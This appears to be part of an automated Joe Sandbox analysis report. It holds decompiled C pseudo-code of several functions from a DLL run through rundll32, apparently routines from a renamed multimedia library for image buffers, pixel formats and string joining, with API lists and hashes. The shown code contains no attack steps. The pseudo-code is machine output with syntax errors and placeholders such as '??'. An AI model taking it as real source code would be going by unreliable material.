                                                      				char _v80;
                                                      				intOrPtr _v83;
                                                      				intOrPtr _v87;
                                                      				intOrPtr _v91;
                                                      				intOrPtr _v95;
                                                      				intOrPtr _v99;
                                                      				intOrPtr _v103;
                                                      				intOrPtr _v107;
                                                      				intOrPtr _v111;
                                                      				intOrPtr _v115;
                                                      				char _v119;
                                                      				long _v132;
                                                      				char* _v136;
                                                      				long _t28;
                                                      				void* _t30;
                                                      				void* _t33;
                                                      				void* _t34;
                                                      				long _t36;
                                                      				void* _t39;
                                                      				long* _t41;
                                                      
                                                      				_v119 = 0x6f727245;
                                                      				_v115 = 0x6c632072;
                                                      				_v111 = 0x696e6165;
                                                      				_v107 = 0x7520676e;
                                                      				_v103 = 0x70732070;
                                                      				_v99 = 0x6b5f6e69;
                                                      				_v95 = 0x20737965;
                                                      				_v91 = 0x20726f66;
                                                      				_v87 = 0x65726874;
                                                      				_v83 = 0x206461;
                                                      				_v79 = 0;
                                                      				_v16 = 0;
                                                      				memset( &_v76, 0, 0x10 << 2);
                                                      				_t41 = _t39 - 0x88 + 0xc;
                                                      				_t28 = GetCurrentThreadId();
                                                      				_v132 = 0xa;
                                                      				_v136 =  &_v80;
                                                      				 *_t41 = _t28;
                                                      				__imp___ultoa();
                                                      				if(_v80 == 0) {
                                                      					L8:
                                                      					_t33 = 0x28;
                                                      					_t25 =  &_v119; // 0x6f727245
                                                      					_t36 = _t25;
                                                      					L6:
                                                      					_t41[0xf] = 0xa;
                                                      					 *((char*)(_t41 + _t33 + 0x15)) = 0;
                                                      					L7:
                                                      					 *_t41 = _t36;
                                                      					OutputDebugStringA(??);
                                                      					_t41 = _t41 - 4;
                                                      					abort();
                                                      					goto L8;
                                                      				}
                                                      				_t30 = 0x27;
                                                      				_t19 =  &_v119; // 0x6f727245
                                                      				_t36 = _t19;
                                                      				while(1) {
                                                      					_t34 = _t30;
                                                      					_t30 = _t30 + 1;
                                                      					if( *((char*)(_t36 + _t30)) == 0) {
                                                      						break;
                                                      					}
                                                      					if(_t30 == 0x6a) {
                                                      						goto L7;
                                                      					}
                                                      				}
                                                      				if(_t30 == 0x6a) {
                                                      					goto L7;
                                                      				}
                                                      				_t33 = _t34 + 2;
                                                      				goto L6;
                                                      			}

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: CurrentDebugOutputStringThread_ultoaabort
                                                      • String ID: Erro$ad $eani$eys $for $in_k$ng u$p sp$r cl$thre
                                                      • API String ID: 4191895893-3726152543
                                                      • Opcode ID: 32d6918716459faddcb7dc1042b6d8857ba7126cf37684ded785e2cb3a3e0069
                                                      • Instruction ID: 088c25127c847526b46776e24d12a3bdf4591a2816cfb9b61a0b1617db757378
                                                      • Opcode Fuzzy Hash: 32d6918716459faddcb7dc1042b6d8857ba7126cf37684ded785e2cb3a3e0069
                                                      • Instruction Fuzzy Hash: 942117B050C3819FE354EF64C19931FBBE2EB81304F909D2DE4894A3A5CBB9C9498B47
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 22%
                                                      			E10010320(intOrPtr* _a4) {
                                                      				signed int _v32;
                                                      				signed int _v36;
                                                      				intOrPtr _v40;
                                                      				signed int _v48;
                                                      				intOrPtr _v52;
                                                      				signed int _v56;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int _t97;
                                                      				signed int _t100;
                                                      				signed int _t106;
                                                      				signed int _t112;
                                                      				signed int _t118;
                                                      				signed int _t124;
                                                      				signed int _t130;
                                                      				signed int _t136;
                                                      				signed int _t139;
                                                      				signed int _t147;
                                                      				intOrPtr _t148;
                                                      				intOrPtr _t149;
                                                      				intOrPtr _t150;
                                                      				intOrPtr _t151;
                                                      				intOrPtr _t152;
                                                      				intOrPtr _t153;
                                                      				signed int _t154;
                                                      				signed int _t158;
                                                      				signed int _t172;
                                                      				signed int _t174;
                                                      				signed int _t176;
                                                      				signed int _t178;
                                                      				signed int _t180;
                                                      				signed int _t182;
                                                      				signed int _t184;
                                                      				signed int _t186;
                                                      				signed int _t187;
                                                      				intOrPtr* _t188;
                                                      				intOrPtr* _t189;
                                                      				signed int _t199;
                                                      				void* _t200;
                                                      				intOrPtr* _t201;
                                                      
                                                      				_t188 = 0x100b0200;
                                                      				_t201 = _t200 - 0x2c;
                                                      				_v40 = 0;
                                                      				_t189 = _a4;
                                                      				while(1) {
                                                      					_v40 = _v40 + 1;
                                                      					_t188 = _t188 + 0x40;
                                                      					if(_v40 == 0x17) {
                                                      						break;
                                                      					}
                                                      					_t6 = _t188 + 0x10; // 0x1000ffb0
                                                      					if( *_t6 == 0) {
                                                      						continue;
                                                      					} else {
                                                      						_t9 = _t188 + 0x10; // 0x1000ffb0
                                                      						_t10 = _t188 + 0x14; // 0x10010008
                                                      						_t172 =  *_t10;
                                                      						 *_t201 =  *((intOrPtr*)(_t189 + 0x10));
                                                      						_v56 =  *((intOrPtr*)(_t189 + 0x14));
                                                      						_v52 =  *_t9;
                                                      						_v48 = _t172;
                                                      						_t97 = L10032EF0( *((intOrPtr*)(_t189 + 0x14)), _t188, _t189);
                                                      						_t147 = _t172;
                                                      						_t14 = _t188 + 0x1c; // 0x1000fde8
                                                      						_t192 =  <  ? _t97 :  ~_t97;
                                                      						_t15 = _t188 + 0x18; // 0x10010060
                                                      						_v48 =  *_t14;
                                                      						_v52 =  *_t15;
                                                      						_t174 =  *((intOrPtr*)(_t189 + 0x1c));
                                                      						 *_t201 =  *((intOrPtr*)(_t189 + 0x18));
                                                      						_v56 = _t174;
                                                      						_t100 = L10032EF0(_t147, _t188, _t189);
                                                      						 *_t201 =  <  ? _t97 :  ~_t97;
                                                      						_v56 = _t147;
                                                      						_v48 = _t174;
                                                      						_t102 =  <  ? _t100 :  ~_t100;
                                                      						_v52 =  <  ? _t100 :  ~_t100;
                                                      						_t148 = L10032E70(_t147, _t189);
                                                      						_t24 = _t188 + 0x20; // 0x1000fe50
                                                      						_t25 = _t188 + 0x24; // 0x0
                                                      						_v52 =  *_t24;
                                                      						_v48 =  *_t25;
                                                      						_t176 =  *((intOrPtr*)(_t189 + 0x24));
                                                      						 *_t201 =  *((intOrPtr*)(_t189 + 0x20));
                                                      						_v56 = _t176;
                                                      						_t106 = L10032EF0(_t148, _t188, _t189);
                                                      						 *_t201 = _t148;
                                                      						_v56 = _t174;
                                                      						_v48 = _t176;
                                                      						_t108 =  <  ? _t106 :  ~_t106;
                                                      						_v52 =  <  ? _t106 :  ~_t106;
                                                      						_t149 = L10032E70(_t148, _t189);
                                                      						_t34 = _t188 + 0x28; // 0x0
                                                      						_t35 = _t188 + 0x2c; // 0x0
                                                      						_v52 =  *_t34;
                                                      						_v48 =  *_t35;
                                                      						_t178 =  *((intOrPtr*)(_t189 + 0x2c));
                                                      						 *_t201 =  *((intOrPtr*)(_t189 + 0x28));
                                                      						_v56 = _t178;
                                                      						_t112 = L10032EF0(_t149, _t188, _t189);
                                                      						 *_t201 = _t149;
                                                      						_v56 = _t176;
                                                      						_v48 = _t178;
                                                      						_t114 =  <  ? _t112 :  ~_t112;
                                                      						_v52 =  <  ? _t112 :  ~_t112;
                                                      						_t150 = L10032E70(_t149, _t189);
                                                      						_t44 = _t188 + 0x30; // 0x0
                                                      						_t45 = _t188 + 0x34; // 0x0
                                                      						_v52 =  *_t44;
                                                      						_v48 =  *_t45;
                                                      						_t180 =  *((intOrPtr*)(_t189 + 0x34));
                                                      						 *_t201 =  *((intOrPtr*)(_t189 + 0x30));
                                                      						_v56 = _t180;
                                                      						_t118 = L10032EF0(_t150, _t188, _t189);
                                                      						 *_t201 = _t150;
                                                      						_v56 = _t178;
                                                      						_v48 = _t180;
                                                      						_t120 =  <  ? _t118 :  ~_t118;
                                                      						_v52 =  <  ? _t118 :  ~_t118;
                                                      						_t151 = L10032E70(_t150, _t189);
                                                      						_t54 = _t188 + 0x38; // 0x0
                                                      						_t55 = _t188 + 0x3c; // 0x0
                                                      						_v52 =  *_t54;
                                                      						_v48 =  *_t55;
                                                      						_t182 =  *((intOrPtr*)(_t189 + 0x3c));
                                                      						 *_t201 =  *((intOrPtr*)(_t189 + 0x38));
                                                      						_v56 = _t182;
                                                      						_t124 = L10032EF0(_t151, _t188, _t189);
                                                      						 *_t201 = _t151;
                                                      						_v56 = _t180;
                                                      						_v48 = _t182;
                                                      						_t126 =  <  ? _t124 :  ~_t124;
                                                      						_v52 =  <  ? _t124 :  ~_t124;
                                                      						_t152 = L10032E70(_t151, _t189);
                                                      						_t64 = _t188 + 4; // 0x1000fea8
                                                      						_v52 =  *_t188;
                                                      						_v48 =  *_t64;
                                                      						_t184 =  *(_t189 + 4);
                                                      						 *_t201 =  *_t189;
                                                      						_v56 = _t184;
                                                      						_t130 = L10032EF0(_t152, _t188, _t189);
                                                      						 *_t201 = _t152;
                                                      						_v56 = _t182;
                                                      						_v48 = _t184;
                                                      						_t132 =  <  ? _t130 :  ~_t130;
                                                      						_v52 =  <  ? _t130 :  ~_t130;
                                                      						_t153 = L10032E70(_t152, _t189);
                                                      						_t72 = _t188 + 8; // 0x1000ff00
                                                      						_t73 = _t188 + 0xc; // 0x1000ff58
                                                      						_v52 =  *_t72;
                                                      						_v48 =  *_t73;
                                                      						_t186 =  *(_t189 + 0xc);
                                                      						 *_t201 =  *((intOrPtr*)(_t189 + 8));
                                                      						_v56 = _t186;
                                                      						_t136 = L10032EF0(_t153, _t188, _t189);
                                                      						 *_t201 = _t153;
                                                      						_v56 = _t184;
                                                      						_v48 = _t186;
                                                      						_t138 =  <  ? _t136 :  ~_t136;
                                                      						_v52 =  <  ? _t136 :  ~_t136;
                                                      						_t139 = L10032E70(_t153, _t189);
                                                      						_v36 = _t186;
                                                      						_t154 = _t139;
                                                      						_t199 = _t186;
                                                      						_v32 = _t186 >> 0x1f;
                                                      						_t187 = 0x3e8 * _t154 >> 0x20;
                                                      						asm("sbb edx, [esp+0x1c]");
                                                      						if((_t187 | 0x000003e8 * _t154 - _v36) != 0) {
                                                      							_t158 = (_v32 ^ _t187) >> 0x0000001f | 0x00000001;
                                                      							goto L7;
                                                      						} else {
                                                      							if(_t199 != 0) {
                                                      								continue;
                                                      							} else {
                                                      								if(_t154 == 0) {
                                                      									L8:
                                                      									return _v40;
                                                      								} else {
                                                      									_t158 = _t154 >> 0x1f;
                                                      									L7:
                                                      									if(_t158 + 1 != 0) {
                                                      										continue;
                                                      									} else {
                                                      										goto L8;
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      					}
                                                      					L11:
                                                      				}
                                                      				_v40 = 2;
                                                      				return _v40;
                                                      				goto L11;
                                                      			}

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_sub_q$mv_add_q$mv_reduce
                                                      • String ID:
                                                      • API String ID: 416313997-0
                                                      • Opcode ID: 16bc828a6e54490581e3bca817dbe7aaeb3a5d58f0d8fddf083b3c311aad9c19
                                                      • Instruction ID: 137885487f331a62fd44dc5ad255b81a0a07b8edcdf78e8c3b60c95945d2ee5e
                                                      • Opcode Fuzzy Hash: 16bc828a6e54490581e3bca817dbe7aaeb3a5d58f0d8fddf083b3c311aad9c19
                                                      • Instruction Fuzzy Hash: 9881B2B4A08B06AFC744DF6AC18151AFBE1FF88251F10C92EE98DC7711E670E8519F82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 17%
                                                      			E1001F1FB(signed int __edx, void* __eflags) {
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				signed int _t98;
                                                      				signed int _t103;
                                                      				void* _t117;
                                                      				signed int _t121;
                                                      				signed int _t125;
                                                      				signed int _t129;
                                                      				signed int _t133;
                                                      				void* _t138;
                                                      				void* _t140;
                                                      				void* _t141;
                                                      				void* _t142;
                                                      				signed int _t143;
                                                      				signed int _t144;
                                                      				void* _t148;
                                                      				signed int _t159;
                                                      				signed int _t163;
                                                      				signed int* _t165;
                                                      				void* _t170;
                                                      				signed int _t172;
                                                      				signed int _t174;
                                                      				signed int _t180;
                                                      				signed int _t181;
                                                      				signed int _t182;
                                                      				void* _t183;
                                                      				signed char _t184;
                                                      				signed int _t190;
                                                      				void* _t191;
                                                      				signed int _t192;
                                                      				signed int _t194;
                                                      				void* _t195;
                                                      				void* _t197;
                                                      				signed int* _t198;
                                                      				signed int _t210;
                                                      
                                                      				_t174 = __edx;
                                                      				_t198 = _t197 - 0x5c;
                                                      				_t165 = _t198[0x1d];
                                                      				_t194 = _t198[0x1e];
                                                      				_t192 = _t198[0x21];
                                                      				 *_t198 = _t198[0x20];
                                                      				_t98 = L10031C70();
                                                      				_t198[0xb] = _t98;
                                                      				_t201 = _t98;
                                                      				if(_t98 == 0) {
                                                      					L29:
                                                      					_t195 = 0xffffffea;
                                                      					goto L17;
                                                      				} else {
                                                      					_t198[1] = _t194;
                                                      					_t198[0x11] = 0;
                                                      					_t198[0x12] = 0;
                                                      					_t198[2] = 0;
                                                      					 *_t198 = 0xffffffff;
                                                      					_t198[0x10] = 0x100b3560;
                                                      					_t103 = L1001E960(_t201);
                                                      					asm("cdq");
                                                      					asm("sbb edi, edx");
                                                      					if(0 >= _t103) {
                                                      						_t174 = (0 << 0x00000020 | _t194) << 3;
                                                      						_t103 = _t194 << 3;
                                                      					}
                                                      					_t198[8] = _t103 + 0x400;
                                                      					_t105 = _t198[0x1f];
                                                      					asm("adc edx, 0x0");
                                                      					_t198[9] = _t174;
                                                      					if((_t198[0x1f] & 0xffffff00 | _t105 <= 0x00000000 | _t174 & 0xffffff00 | _t194 <= 0x00000000) != 0) {
                                                      						L28:
                                                      						_t198[3] = _t194;
                                                      						_t198[4] = _t198[0x1f];
                                                      						_t198[2] = "Picture size %ux%u is invalid\n";
                                                      						_t198[1] = 0x10;
                                                      						 *_t198 =  &(_t198[0x10]);
                                                      						L10023A40();
                                                      						goto L29;
                                                      					}
                                                      					asm("sbb ecx, edx");
                                                      					if(0x7ffffffe < _t198[8]) {
                                                      						goto L28;
                                                      					}
                                                      					asm("sbb edi, edx");
                                                      					if(0x7ffffffe < (_t198[0x1f] + 0x80) * _t198[8]) {
                                                      						goto L28;
                                                      					}
                                                      					if(_t192 > 7) {
                                                      						_t163 = _t194 + 0x00000007 & 0xfffffff8;
                                                      						_t210 = _t163;
                                                      						_t194 = _t163;
                                                      					}
                                                      					_t198[2] = _t194;
                                                      					 *_t198 = _t165;
                                                      					_t198[1] = _t198[0x20];
                                                      					_t117 = L1001EAB0(_t210);
                                                      					_t211 = _t117;
                                                      					_t195 = _t117;
                                                      					if(_t117 < 0) {
                                                      						L17:
                                                      						return _t195;
                                                      					} else {
                                                      						_t180 =  ~_t192;
                                                      						_t121 =  *_t165 + _t192 - 0x00000001 & _t180;
                                                      						 *_t165 = _t121;
                                                      						_t198[0xc] = _t121;
                                                      						_t125 = _t165[1] + _t192 - 0x00000001 & _t180;
                                                      						_t165[1] = _t125;
                                                      						_t198[0xd] = _t125;
                                                      						_t129 = _t165[2] + _t192 - 0x00000001 & _t180;
                                                      						_t165[2] = _t129;
                                                      						_t198[0xe] = _t129;
                                                      						_t133 = _t165[3] + _t192 - 0x00000001 & _t180;
                                                      						_t165[3] = _t133;
                                                      						_t198[0xf] = _t133;
                                                      						_t198[3] =  &(_t198[0xc]);
                                                      						_t198[2] = _t198[0x1f];
                                                      						_t198[1] = _t198[0x20];
                                                      						 *_t198 =  &(_t198[0x10]);
                                                      						_t138 = L1001EE90(_t165, 0, _t192, _t195, _t211);
                                                      						_t195 = _t138;
                                                      						if(_t138 < 0) {
                                                      							goto L17;
                                                      						}
                                                      						_t140 = _t192 + _t198[0x10];
                                                      						if(_t140 < 0) {
                                                      							goto L29;
                                                      						}
                                                      						_t141 = _t140 + _t198[0x11];
                                                      						if(_t141 < 0) {
                                                      							goto L29;
                                                      						}
                                                      						_t142 = _t141 + _t198[0x12];
                                                      						if(_t142 < 0) {
                                                      							goto L29;
                                                      						}
                                                      						_t143 = _t142 + _t198[0x13];
                                                      						if(_t143 < 0) {
                                                      							goto L29;
                                                      						}
                                                      						 *_t198 = _t143;
                                                      						_t144 = E10026230();
                                                      						_t190 = _t144;
                                                      						if(_t144 == 0) {
                                                      							_t195 = 0xfffffff4;
                                                      							goto L17;
                                                      						}
                                                      						_t198[3] = _t144;
                                                      						_t198[4] = _t165;
                                                      						_t198[2] = _t198[0x1f];
                                                      						_t198[1] = _t198[0x20];
                                                      						 *_t198 = _t198[0x1c];
                                                      						_t148 = L1001EFD0(_t165, _t190, _t192, _t195);
                                                      						_t195 = _t148;
                                                      						if(_t148 < 0) {
                                                      							 *_t198 = _t190;
                                                      							L100265B0();
                                                      							goto L17;
                                                      						}
                                                      						if(( *(_t198[0xb] + 8) & 0x00000002) != 0) {
                                                      							_t181 =  *(_t198[0x1c] + 4);
                                                      							 *_t198 = _t181;
                                                      							_t198[1] = _t198[0x20];
                                                      							_t198[8] = _t181;
                                                      							E1001F0D0();
                                                      							__eflags = _t192 - 3;
                                                      							_t182 = _t198[8];
                                                      							if(_t192 <= 3) {
                                                      								_t198[2] = "Formats with a palette require a minimum alignment of 4\n";
                                                      								_t198[1] = 0x10;
                                                      								 *_t198 = 0;
                                                      								L10023A40();
                                                      								 *_t198 = _t190;
                                                      								L100265B0();
                                                      								goto L29;
                                                      							}
                                                      							__eflags = _t182;
                                                      							if(_t182 != 0) {
                                                      								_t170 =  *(_t198[0x1c]);
                                                      								_t183 = _t182 - _t170;
                                                      								_t159 = _t198[0x1f] *  *_t165;
                                                      								__eflags = _t183 - _t159;
                                                      								if(_t183 > _t159) {
                                                      									_t191 = _t170 + _t159;
                                                      									_t184 = _t183 - _t159;
                                                      									__eflags = _t184 - 8;
                                                      									if(_t184 >= 8) {
                                                      										__eflags = _t191 & 0x00000001;
                                                      										if((_t191 & 0x00000001) != 0) {
                                                      											 *_t191 = 0;
                                                      											_t184 = _t184 - 1;
                                                      											_t191 = _t191 + 1;
                                                      										}
                                                      										__eflags = _t191 & 0x00000002;
                                                      										if((_t191 & 0x00000002) != 0) {
                                                      											 *_t191 = 0;
                                                      											_t184 = _t184 - 2;
                                                      											_t191 = _t191 + 2;
                                                      										}
                                                      										__eflags = _t191 & 0x00000004;
                                                      										if((_t191 & 0x00000004) != 0) {
                                                      											 *_t191 = 0;
                                                      											_t184 = _t184 - 4;
                                                      											_t191 = _t191 + 4;
                                                      										}
                                                      										_t172 = _t184 >> 2;
                                                      										_t184 = _t184 & 0x00000003;
                                                      										memset(_t191, 0, _t172 << 2);
                                                      										_t198 =  &(_t198[3]);
                                                      										_t191 = _t191 + _t172;
                                                      									}
                                                      									__eflags = _t184 & 0x00000004;
                                                      									if((_t184 & 0x00000004) != 0) {
                                                      										 *_t191 = 0;
                                                      										_t191 = _t191 + 4;
                                                      										__eflags = _t191;
                                                      									}
                                                      									__eflags = _t184 & 0x00000002;
                                                      									if((_t184 & 0x00000002) != 0) {
                                                      										 *_t191 = 0;
                                                      										_t191 = _t191 + 2;
                                                      										__eflags = _t191;
                                                      									}
                                                      									__eflags = _t184 & 0x00000001;
                                                      									if((_t184 & 0x00000001) != 0) {
                                                      										 *_t191 = 0;
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      						goto L17;
                                                      					}
                                                      				}
                                                      			}


                                                      APIs
                                                      • mv_pix_fmt_desc_get.MAIN ref: 1001F220
                                                      • mv_image_get_linesize.MAIN ref: 1001F259
                                                        • Part of subcall function 1001E960: mv_pix_fmt_desc_get.MAIN(?,?,?,?,?,?,?,?,?,?,00000000,?,100B3560,00000000,1001F6E8), ref: 1001E976
                                                      • mv_image_fill_linesizes.MAIN(?), ref: 1001F2F7
                                                      • mv_image_fill_plane_sizes.MAIN(?), ref: 1001F366
                                                      • mv_malloc.MAIN(?), ref: 1001F39E
                                                      • mv_image_fill_pointers.MAIN(?), ref: 1001F3CF
                                                        • Part of subcall function 1001EFD0: mv_image_fill_plane_sizes.MAIN ref: 1001F040
                                                      • mvpriv_set_systematic_pal2.MAIN(?), ref: 1001F419
                                                      Strings
                                                      • Picture size %ux%u is invalid, xrefs: 1001F48C
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_image_fill_plane_sizesmv_pix_fmt_desc_get$mv_image_fill_linesizesmv_image_fill_pointersmv_image_get_linesizemv_mallocmvpriv_set_systematic_pal2
                                                      • String ID: Picture size %ux%u is invalid
                                                      • API String ID: 3240037220-1963597007
                                                      • Opcode ID: c0da3f089ef4c1a1a8e32dceaedc98ce32d43ce566857b51ffa12b0a32c2eabb
                                                      • Instruction ID: e23022134abe2078ba7cb28d25bebe71f56db34df5c954ccbe64bd9ec64da2e1
                                                      • Opcode Fuzzy Hash: c0da3f089ef4c1a1a8e32dceaedc98ce32d43ce566857b51ffa12b0a32c2eabb
                                                      • Instruction Fuzzy Hash: 55911576A087418FC350DF28C48572BBBE2FF98354F15892DE9A8CB355EB35D9818B42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 30%
                                                      			E1002E2A5(void* __ecx, void* __fp0, intOrPtr* _a4, signed int _a8, signed int _a12, intOrPtr* _a16, char _a20, signed int _a24) {
                                                      				char _v1052;
                                                      				char _v1056;
                                                      				char _v1057;
                                                      				char _v1058;
                                                      				signed int _v1059;
                                                      				char _v1072;
                                                      				signed int _v1076;
                                                      				signed int _v1080;
                                                      				intOrPtr _v1100;
                                                      				char* _v1104;
                                                      				char* _v1108;
                                                      				void* _v1112;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				signed int _t84;
                                                      				void* _t89;
                                                      				void* _t96;
                                                      				char _t118;
                                                      				void* _t119;
                                                      				void* _t120;
                                                      				void* _t122;
                                                      				intOrPtr _t125;
                                                      				signed int _t128;
                                                      				intOrPtr _t131;
                                                      				signed int _t134;
                                                      				signed int _t135;
                                                      				intOrPtr* _t136;
                                                      				signed int _t137;
                                                      				signed int _t139;
                                                      				void* _t140;
                                                      				intOrPtr* _t141;
                                                      				void* _t168;
                                                      
                                                      				_t168 = __fp0;
                                                      				_t141 = _t140 - 0x44c;
                                                      				_t128 = _a24;
                                                      				_t118 = _a20;
                                                      				_v1057 = 0;
                                                      				_t137 = _a8;
                                                      				_t134 = _a12;
                                                      				_v1076 = _t128;
                                                      				_v1072 = _t118;
                                                      				_v1059 = _t128;
                                                      				_v1058 = _t118;
                                                      				if(_t128 == 0 || _t118 == 0 || (_t128 & 0xffffff00 | _t128 == 0x0000005c | _t128 & 0xffffff00 | _t128 == _t118) != 0 || _t118 == 0x5c) {
                                                      					_v1108 = "Invalid separator(s) found.";
                                                      					_v1112 = 0x10;
                                                      					 *_t141 = _a4;
                                                      					L10023A40();
                                                      					goto L34;
                                                      				} else {
                                                      					if(_a4 == 0 || _a16 == 0) {
                                                      						L34:
                                                      						_t119 = 0xffffffea;
                                                      						goto L30;
                                                      					} else {
                                                      						_t135 = _t134 & 0x00000001;
                                                      						_t139 = _t134 & 0x00000002;
                                                      						_t120 = 0;
                                                      						 *_a16 = 0;
                                                      						_v1108 = 0xffffffff;
                                                      						_v1112 = 0x40;
                                                      						 *_t141 =  &_v1052;
                                                      						E10008880(0, _t135, _t137, _t139);
                                                      						_v1080 = _t135;
                                                      						_t136 = 0;
                                                      						_t125 =  *_a4;
                                                      						L7:
                                                      						while(1) {
                                                      							L7:
                                                      							while(1) {
                                                      								L7:
                                                      								while(1) {
                                                      									if(_t136 != 0) {
                                                      										L23:
                                                      										_t131 =  *((intOrPtr*)(_t136 + 0x30));
                                                      										if(_t131 == 0) {
                                                      											goto L29;
                                                      										} else {
                                                      											_t136 = _t136 + 0x30;
                                                      											goto L11;
                                                      										}
                                                      									} else {
                                                      										L8:
                                                      										if(_t125 == 0) {
                                                      											if(_t136 != 0) {
                                                      												goto L23;
                                                      											} else {
                                                      												goto L29;
                                                      											}
                                                      										} else {
                                                      											_t136 =  *((intOrPtr*)(_t125 + 8));
                                                      											if(_t136 == 0) {
                                                      												L29:
                                                      												_v1112 = _a16;
                                                      												 *_t141 =  &_v1052;
                                                      												_t119 =  <=  ? E10009690(_t120, _t125, _t136, _t137) : 0;
                                                      												L30:
                                                      												return _t119;
                                                      											} else {
                                                      												_t131 =  *_t136;
                                                      												if(_t131 == 0) {
                                                      													goto L29;
                                                      												} else {
                                                      													L11:
                                                      													if( *((intOrPtr*)(_t136 + 0xc)) == 0xa) {
                                                      														continue;
                                                      													} else {
                                                      														_t84 =  *(_t136 + 0x28);
                                                      														if(_t139 == 0) {
                                                      															if((_t84 & _t137) != _t137) {
                                                      																continue;
                                                      															} else {
                                                      																goto L14;
                                                      															}
                                                      														} else {
                                                      															if(_t137 != _t84) {
                                                      																continue;
                                                      															} else {
                                                      																L14:
                                                      																if(_v1080 == 0) {
                                                      																	L17:
                                                      																	_v1112 = _t131;
                                                      																	_v1104 =  &_v1056;
                                                      																	_v1108 = 0;
                                                      																	 *_t141 = _a4;
                                                      																	_t89 = L1002AD50(_t120, _t136, _t137, _t139);
                                                      																	if(_t89 < 0) {
                                                      																		_t122 = _t89;
                                                      																		_v1112 = 0;
                                                      																		 *_t141 =  &_v1052;
                                                      																		E10009690(_t122, 0, _t136, _t137);
                                                      																		return _t122;
                                                      																	} else {
                                                      																		if(_v1056 != 0) {
                                                      																			_t96 = _t120;
                                                      																			_t120 = _t120 + 1;
                                                      																			if(_t96 != 0) {
                                                      																				_v1108 = 1;
                                                      																				_v1112 =  &_v1076;
                                                      																				 *_t141 =  &_v1052;
                                                      																				L10008F30();
                                                      																			}
                                                      																			_v1100 = 0;
                                                      																			_v1104 = 1;
                                                      																			_v1108 =  &_v1059;
                                                      																			_v1112 =  *_t136;
                                                      																			 *_t141 =  &_v1052;
                                                      																			E10009730();
                                                      																			_v1112 =  &_v1072;
                                                      																			_v1108 = 1;
                                                      																			 *_t141 =  &_v1052;
                                                      																			L10008F30();
                                                      																			_v1100 = 0;
                                                      																			_v1104 = 1;
                                                      																			_v1108 =  &_v1059;
                                                      																			_v1112 = _v1056;
                                                      																			 *_t141 =  &_v1052;
                                                      																			E10009730();
                                                      																			 *_t141 =  &_v1056;
                                                      																			E100265C0();
                                                      																		}
                                                      																		goto L21;
                                                      																	}
                                                      																} else {
                                                      																	_v1112 = _t136;
                                                      																	 *_t141 = _a4;
                                                      																	if(L1002DCE0(_t120, _t125, _t136, _t137, _t139, _t168) > 0) {
                                                      																		L21:
                                                      																		_t125 =  *_a4;
                                                      																		if(_t136 == 0) {
